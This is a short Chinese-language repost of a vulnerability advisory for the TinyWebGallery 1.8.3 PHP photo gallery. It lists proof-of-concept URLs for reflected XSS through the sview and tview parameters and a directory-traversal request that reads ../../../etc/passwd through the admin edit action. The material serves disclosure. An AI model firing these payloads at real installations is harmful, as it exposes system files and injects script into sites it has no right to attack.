TinyWebGallery 1.8.3版多個安全漏洞漏洞預(yù)警 -電腦資料

電腦資料時間：2019-01-01 我要投稿

【m.emoneyp.cn - 電腦資料】

TinyWebGallery是一款php相冊程序，TinyWebGallery 1.8.3中包含多個安全漏洞，包括目錄遍歷和XSS，可能導(dǎo)致敏感信息泄露，

。

[+]info:

~~~~~~~~~

Script. TinyWebGallery

Version: 1.8.3 (No fixes yet, might work on other versions too).

Home: http://www.tinywebgallery.com

[+]poc:

~~~~~~~~~

http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"

http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"

http://localhost/twg183/admin/index.php?dir=

http://localhost/twg183/admin/index.php?action=chmod&item=

http://localhost/twg183/twg183/admin/index.php?action=chmod&item=">

http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd

[+]Reference:

~~~~~~~~~

http://www.exploit-db.com/exploits/16090

相關(guān)文章